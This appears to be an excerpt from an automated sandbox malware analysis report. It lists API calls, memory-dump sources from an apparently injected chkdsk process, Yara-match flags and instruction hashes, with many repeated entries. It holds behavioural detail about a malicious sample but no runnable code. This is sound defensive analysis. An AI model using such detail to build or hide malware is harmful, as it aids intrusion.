                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: d2740fb4e56cf6df44d39918b4b921172e52b282ea08be515a745012309a7df5
                                                                                                                                                                                                                                • Instruction ID: 9f16b4a1ba896d31b6ad79f0e48c03b1265d7a584873c4036ddf2ec7d096b65f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2740fb4e56cf6df44d39918b4b921172e52b282ea08be515a745012309a7df5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C890023160500C02D650715845587C6101587D0301F92C416A0115654DD7658A5576A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 8f6383cfd62ef42ca0be5de35639079a9f2152706fc5b7291a12b4be0cb17d01
                                                                                                                                                                                                                                • Instruction ID: a13b6b7fec22a0f3ac461d9fc33e631c151fd491f8e7823f044b122e7d8a4b98
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6383cfd62ef42ca0be5de35639079a9f2152706fc5b7291a12b4be0cb17d01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF90027120200403460571584558696501A87E0201F92C426E1105590DD63588917125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 008873A8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                • Opcode ID: 07b016a1fee8177b095a040ff294a8ff3ad25087744a7a17c03097b4fc4c3d7c
                                                                                                                                                                                                                                • Instruction ID: b5a5f64a3c81cf2a35c7bc2e28dedcb04a95a90e0b770397c417ce06e6bcf178
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07b016a1fee8177b095a040ff294a8ff3ad25087744a7a17c03097b4fc4c3d7c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E319EB6605704ABD715EF68C8A1FABB7B8FF88700F10811DFA199B241D730E945CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 008873A8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                • Opcode ID: 197eb81aad253ceb8be2512152f048684f93ae5d963397c75ea9955d734d4ff9
                                                                                                                                                                                                                                • Instruction ID: a2f9dab815ce50eee2a6d4d7438cc91ecb9c520556832daeb7e72d5417e1e755
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 197eb81aad253ceb8be2512152f048684f93ae5d963397c75ea9955d734d4ff9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21D5B1501705ABD715EF68C8A1F6BB7B4FF48700F10811DFA199B242D774E445CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00873B93), ref: 0088891D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                                • Opcode ID: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                                                                                                                                                                                                • Instruction ID: f4dbeaa377d2f2011f22df00d43792c8fd0cef9223d52d314e3dda0102dde209
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CE01AB52042046BDB14EF58CC49EA777A9EF88750F014559F9195B241C631E910CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00873B93), ref: 0088891D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                                • Instruction ID: ddd02d4577fea16f310df988c9dd6d7de2cddaaa9f6bfd424430b74e44a75bbe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E04FB52042046BD714EF59CC49EA777ACEF88750F014555FD0957241C630F910CBF0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,00000000,00873AC6,00000000), ref: 00881777
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalLookupPrivilegeProcessValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 65721159-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008772DA
                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008772FB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00879BB2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0087CCF0,?,?), ref: 0088746C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00883536,?,00883CAF,00883CAF,?,00883536,?,?,?,?,?,00000000,00000000,?), ref: 008888DD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00877C83,?), ref: 0087D45B
